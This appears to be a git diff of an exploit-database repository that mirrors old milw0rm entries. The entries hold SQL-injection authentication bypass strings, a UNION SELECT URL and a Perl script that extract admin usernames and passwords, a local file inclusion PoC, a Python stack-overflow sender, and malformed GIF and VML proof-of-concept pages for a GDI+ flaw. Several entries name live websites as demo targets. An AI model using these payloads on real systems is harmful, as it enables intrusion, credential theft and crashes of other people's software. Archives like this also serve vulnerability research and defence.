<!-- Any +inconspicuous filename will do --> + +<input type="submit" value="Exploit"> +</form> + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/7023.txt b/platforms/php/webapps/7023.txt index 5255f191d..a7c0e6513 100755 --- a/platforms/php/webapps/7023.txt +++ b/platforms/php/webapps/7023.txt @@ -1,58 +1,58 @@ -[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 06.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -username: [real_admin_name] ' or ' 1=1 - -password: ZoRLu - -note: generally admin name: admin - - - -admin login for demo: - -http://demo.deltascripts.com/classifieds/admin/login.php - - -example for demo: - -admin: admin ' or ' 1=1 - -passwd: ZoRLu - - - -example 2: - -admin login: - -http://www.maramuresul-istoric.ro/anunturi/admin/login.php - - - -admin: admin ' or ' 1=1 - -passwd: ZoRLu - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-06] +[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 06.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +username: [real_admin_name] ' or ' 1=1 + +password: ZoRLu + +note: generally admin name: admin + + + +admin login for demo: + +http://localhost/classifieds/admin/login.php + + +example for demo: + +admin: admin ' or ' 1=1 + +passwd: ZoRLu + + + +example 2: + +admin login: + +http://localhost/anunturi/admin/login.php + + + +admin: admin ' or ' 1=1 + +passwd: ZoRLu + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7024.txt b/platforms/php/webapps/7024.txt index 88d14f24f..92d5561a7 100755 --- a/platforms/php/webapps/7024.txt +++ b/platforms/php/webapps/7024.txt @@ -1,4 +1,4 @@ -[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability +[~] deltascripts phplinks Remote Auth Bypass Vulnerability [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu @@ -25,7 +25,7 @@ note: generally admin name: admin admin login for demo: -http://demo.deltascripts.com/classifieds/admin/login.php +http://localhost/classifieds/admin/login.php example for demo: @@ -40,7 +40,7 @@ example 2: admin login: -http://www.maramuresul-istoric.ro/anunturi/admin/login.php +http://localhost/anunturi/admin/login.php diff --git a/platforms/php/webapps/7087.txt b/platforms/php/webapps/7087.txt index 1bb4bc2fc..42ec3d60c 100755 --- a/platforms/php/webapps/7087.txt +++ b/platforms/php/webapps/7087.txt @@ -1,79 +1,79 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AJ Auction Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ AJ Auction ] - [»] Language: [ PHP ] - [»] Website: [ http://www.ajsquare.com/products/auction/ ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 10.11.2008 ] - [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] - - - [-] AJ Auction OOPD - [+] AJ Auction Pro Platinum Skin #1 - [+] AJ Auction Pro Platinum Skin #2 - [+] AJ Auction Web 2.0 - -===[ XPL ]=== - - [!] When the page gets load, Press ESC btn To Bypass Redirection ;) - - [ Only AJ Auction Pro Platinum Skin #1 ] - [»] http://localhost/[path]/admin/user.php - - [ all ] - [»] http://localhost/[path]/admin/site.php - [»] http://localhost/[path]/admin/auction.php - [»] http://localhost/[path]/admin/mail.php - [»] http://localhost/[path]/admin/fee_setting.php - [»] http://localhost/[path]/admin/earnings.php - [»] http://localhost/[path]/admin/insertion_fee_settings.php - [»] http://localhost/[path]/admin/custom_category.php - [»] http://localhost/[path]/admin/subcategory.php - [»] http://localhost/[path]/admin/category.php - [»] http://localhost/[path]/admin/report.php - [»] http://localhost/[path]/amdin/store_manager.php - [»] http://localhost/[path]/admin/choose_sell_format.php - [»] ... - - - -===[ LIVE ]=== - [!] Skin #1 - [»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php - [»] http://www.tapinglobal.com/admin/ - - [!] Web2.0 - [»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> - [»] Hussain-X <darkangel_g85[at]yahoo.com> - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... - -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-10] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AJ Auction Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ AJ Auction ] + [»] Language: [ PHP ] + [»] Website: [ http://www.ajsquare.com/products/auction/ ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 10.11.2008 ] + [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] + + + [-] AJ Auction OOPD + [+] AJ Auction Pro Platinum Skin #1 + [+] AJ Auction Pro Platinum Skin #2 + [+] AJ Auction Web 2.0 + +===[ XPL ]=== + + [!] When the page gets load, Press ESC btn To Bypass Redirection ;) + + [ Only AJ Auction Pro Platinum Skin #1 ] + [»] http://localhost/[path]/admin/user.php + + [ all ] + [»] http://localhost/[path]/admin/site.php + [»] http://localhost/[path]/admin/auction.php + [»] http://localhost/[path]/admin/mail.php + [»] http://localhost/[path]/admin/fee_setting.php + [»] http://localhost/[path]/admin/earnings.php + [»] http://localhost/[path]/admin/insertion_fee_settings.php + [»] http://localhost/[path]/admin/custom_category.php + [»] http://localhost/[path]/admin/subcategory.php + [»] http://localhost/[path]/admin/category.php + [»] http://localhost/[path]/admin/report.php + [»] http://localhost/[path]/amdin/store_manager.php + [»] http://localhost/[path]/admin/choose_sell_format.php + [»] ... + + + +===[ LIVE ]=== + [!] Skin #1 + [»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php + [»] http://www.tapinglobal.com/admin/ + + [!] Web2.0 + [»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> + [»] Hussain-X <darkangel_g85[at]yahoo.com> + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7836.txt b/platforms/php/webapps/7836.txt index e27d78cf8..6589568da 100755 --- a/platforms/php/webapps/7836.txt +++ b/platforms/php/webapps/7836.txt @@ -1,32 +1,32 @@ -================================================================================================================== -= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = -= S N N N A A K K E S T E A A M M M M = -+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + -= S N N N A A K K E S T E A A M M M = -= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = -===================================================SNAKES TEAM==================================================== -+ = -= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = :::::Mail: snakespc@gmail.com::::::: = - = = = - = http://www.ajsquare.com/products/auction/demo.php "index.php" = - =====================================GAZA============================================= - -Exploit: -http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- -******** -demo: -http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- -============================================================== ALLAH AKBAR========================================================= - -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: -ALL www.Snakespc.com/sc >>>> Members -Str0ke ....Milw0rm -==================================================================GAZA============================================================ - -# milw0rm.com [2009-01-20] +================================================================================================================== += SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = += S N N N A A K K E S T E A A M M M M = ++ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + += S N N N A A K K E S T E A A M M M = += SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = +===================================================SNAKES TEAM==================================================== ++ = += AJAuctionPro OOPD v2.3 SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = :::::Mail: snakespc@gmail.com::::::: = + = = = + = http://www.ajsquare.com/products/auction/demo.php "index.php" = + =====================================GAZA============================================= + +Exploit: +http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- +******** +demo: +http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- +============================================================== ALLAH AKBAR========================================================= + +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: +ALL www.Snakespc.com/sc >>>> Members +Str0ke ....Milw0rm +==================================================================GAZA============================================================ + +# milw0rm.com [2009-01-20] diff --git a/platforms/php/webapps/9447.pl b/platforms/php/webapps/9447.pl index 8e33155cc..efbe8a5a5 100755 --- a/platforms/php/webapps/9447.pl +++ b/platforms/php/webapps/9447.pl @@ -1,53 +1,53 @@ -#!/usr/bin/perl - -#********************************************************# -# # -# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit # -# Software : AJ Auction Pro OOPD 2.x # -# Vendor : http://www.ajsquare.com/ # -# Author : NoGe # -# Contact : noge[dot]code[at]gmail[dot]com # -# Blog : http://evilc0de.blogspot.com # -# # -# [o] Usage # -# root@noge:~# perl ajpro.pl www.target.com # -# # -# [o] Dork # -# "Powered By AJ Auction Pro" # -# # -# [o] Greetz # -# MainHack BrotherHood [ http://mainhack.net ] # -# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang # -# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # -# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # -# # -#********************************************************# - -use HTTP::Request; -use LWP::UserAgent; - -my $target = $ARGV[0]; -my $file_vuln = '/store.php?id='; -my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--'; -print "\n[x]===============================================[x]\n"; -print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n"; -print "[x] [C]oded By NoGe [x]\n"; -print "[x]===============================================[x]\n\n"; - -my $exploit = "http://".$target.$file_vuln.$sql_query; - -my $request = HTTP::Request->new(GET=>$exploit); -my $useragent = LWP::UserAgent->new(); -$useragent->timeout(10); -my $response = $useragent->request($request); -if ($response->is_success) { -my $res = $response->content; -if ($res =~ m/:(.*):(.*):/g) { -my ($username,$password) = ($1,$2); -print "[+] $username:$password \n\n"; -} -else { print "[-] Error, Fail to get admin login.\n\n"; } -} -else { print "[-] Error, ".$response->status_line."\n\n"; } - -# milw0rm.com [2009-08-18] +#!/usr/bin/perl + +#********************************************************# +# # +# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit # +# Software : AJ Auction Pro OOPD 2.x # +# Vendor : http://www.ajsquare.com/ # +# Author : NoGe # +# Contact : noge[dot]code[at]gmail[dot]com # +# Blog : http://evilc0de.blogspot.com # +# # +# [o] Usage # +# root@noge:~# perl ajpro.pl www.target.com # +# # +# [o] Dork # +# "Powered By AJ Auction Pro" # +# # +# [o] Greetz # +# MainHack BrotherHood [ http://mainhack.net ] # +# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang # +# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # +# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # +# # +#********************************************************# + +use HTTP::Request; +use LWP::UserAgent; + +my $target = $ARGV[0]; +my $file_vuln = '/store.php?id='; +my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--'; +print "\n[x]===============================================[x]\n"; +print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n"; +print "[x] [C]oded By NoGe [x]\n"; +print "[x]===============================================[x]\n\n"; + +my $exploit = "http://".$target.$file_vuln.$sql_query; + +my $request = HTTP::Request->new(GET=>$exploit); +my $useragent = LWP::UserAgent->new(); +$useragent->timeout(10); +my $response = $useragent->request($request); +if ($response->is_success) { +my $res = $response->content; +if ($res =~ m/:(.*):(.*):/g) { +my ($username,$password) = ($1,$2); +print "[+] $username:$password \n\n"; +} +else { print "[-] Error, Fail to get admin login.\n\n"; } +} +else { print "[-] Error, ".$response->status_line."\n\n"; } + +# milw0rm.com [2009-08-18] diff --git a/platforms/php/webapps/9459.txt b/platforms/php/webapps/9459.txt index 1842791e6..5698e170e 100755 --- a/platforms/php/webapps/9459.txt +++ b/platforms/php/webapps/9459.txt @@ -1,20 +1,20 @@ -2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09) - - -DESCRIPTION ------------------ -Additional to the authentication bypass exploit page submitted by hkm. - - -EXPLOIT/POC - ------------------ -Authentication Bypass - just use this page to set a new password - -http://gateway.2wire.net/setup/password_required.html - - - -bugz - -# milw0rm.com [2009-08-18] +2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET - Part 2 (08/15/09) + + +DESCRIPTION +----------------- +Additional to the authentication bypass exploit page submitted by hkm. + + +EXPLOIT/POC + +----------------- +Authentication Bypass - just use this page to set a new password + +http://gateway.2wire.net/setup/password_required.html + + + +bugz + +# milw0rm.com [2009-08-18] diff --git a/platforms/php/webapps/9846.txt b/platforms/php/webapps/9846.txt deleted file mode 100755 index a8493d0a8..000000000 --- a/platforms/php/webapps/9846.txt +++ /dev/null @@ -1,22 +0,0 @@ -[*] Endonesia 8.4 CMS -[*] Site: http://www.endonesia.org/ -[*] Download: http://sourceforge.net/projects/endonesia -[*] Bug: Local File Inclusion in mod.php file ! -[*] Author: s4r4d0 -[*] Mail: s4r4d0@yahoo.com -[*] Team: Fatal Error -[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00 -[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00 -[*] SecurityReason Note : -# -# Vulnerable Code in mod.php : -# -# include("./mod/$mod/index.php"); -# -# magic_quotes = Off -# -# - sp3x -# -[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x ! -[*] Made in Brazil -[*] Reference: http://securityreason.com/exploitalert/7435 \ No newline at end of file diff --git a/platforms/windows/dos/33403.py b/platforms/windows/dos/33403.py new file mode 100755 index 000000000..b9f47968d --- /dev/null +++ b/platforms/windows/dos/33403.py @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/37325/info + +Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +#!/usr/bin/python + +# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite. +# Ruben Santamarta - www.reversemode.com +# For research purposes ONLY. +# If you use this code to cause damage I’ll cut you open like a f***ing pig. + +import sys +import socket + +s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) +s.connect(("10.10.10.10",3250)) +s.send("protocol version = 1.10; " + +"fb type = EVIL-DEVICE; " + +"module version = 0.66.6; " + +"mac = 00-30-11-00-BA-CA; " + +"ip = 192.168.1.52; " + +"sn = 255.255.255.0; " + +"gw = 192.168.1.1; " + +"dhcp = off; " + +"pswd = off; " + +"hn = "+"A"*0×60+"; " + +"dns1 = 192.168.1.33;") diff --git a/platforms/windows/dos/6619.html b/platforms/windows/dos/6619.html index 421440c58..bdc2f8fb1 100755 --- a/platforms/windows/dos/6619.html +++ b/platforms/windows/dos/6619.html @@ -1,44 +1,44 @@ -<html> -<head> -<STYLE> -ef\:* { behavior: url(#default#VML); } -</STYLE> -</head> - -<body> - -<pre> -================================================ -MS08-052: GDI+ Vulnerability ------------------------------------------------- -Operating System: XP SP2 -Internet Explorer Version: 6.0.2900.2180 -Gdiplus.dll Version: 5.1.3102.2180 - -Credit: -John Smith, -Evil Fingers - -Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt -================================================ -</pre> - -<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef"> - - -<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'> -<ef:fill type="gradientCenter";></ef:fill> -</ef:oval> - -<script> -var focus_size = "-5, -4"; -var focus_pos = ".1, .1"; -var ef_oval = document.getElementById('ef_oval'); - -ef_oval.fill.focussize = focus_size; -ef_oval.fill.focusposition = focus_pos; -</script> -</body> -</html> - -# milw0rm.com [2008-09-28] +<html> +<head> +<STYLE> +ef\:* { behavior: url(#default#VML); } +</STYLE> +</head> + +<body> + +<pre> +================================================ +MS08-052: GDI+ Vulnerability +------------------------------------------------ +Operating System: XP SP2 +Internet Explorer Version: 6.0.2900.2180 +Gdiplus.dll Version: 5.1.3102.2180 + +Credit: +John Smith, +Evil Fingers + +Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt +================================================ +</pre> + +<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef"> + + +<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'> +<ef:fill type="gradientCenter";></ef:fill> +</ef:oval> + +<script> +var focus_size = "-5, -4"; +var focus_pos = ".1, .1"; +var ef_oval = document.getElementById('ef_oval'); + +ef_oval.fill.focussize = focus_size; +ef_oval.fill.focusposition = focus_pos; +</script> +</body> +</html> + +# milw0rm.com [2008-09-28] diff --git a/platforms/windows/dos/6716.pl b/platforms/windows/dos/6716.pl index e6c96e832..d21cf6cd5 100755 --- a/platforms/windows/dos/6716.pl +++ b/platforms/windows/dos/6716.pl @@ -1,217 +1,217 @@ ------------------------------------------------------------------------------------------------------------- -Operating System: XP SP2 -Gdiplus.dll Version: 5.1.3102.2180 - -Credit: - -John Smith, -Evil Fingers - -GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt - -PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt - -http://www.evilfingers.com/patchTuesday/PoC.php -============================================================================================================ - -#!/usr/bin/perl -# -use strict; - -my $gif = - -"\x47\x49\x46\x38\x39\x61". # GIF header -"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor -# COLOR Stream -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33". -"\x21". ## Extension Introducer 0x21 -"\x2C". ## Label 0x2C -# Data Sub-blocks (1) Size: 21+1 -#0 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#1 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC". -"\x21\xEC". -#2 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#3 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#4 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#5 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#6 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#7 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#8 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#9 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#10 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC". -#11 -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC". -"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E". -"\x01\x5A". -"\x00". ## Terminator -"\x21". ## Extension Introducer 0x21 -"\x2C". ## Label 0x2C -# Data Sub-blocks (2) Size: EC+1 -#0 -"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". -"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61". 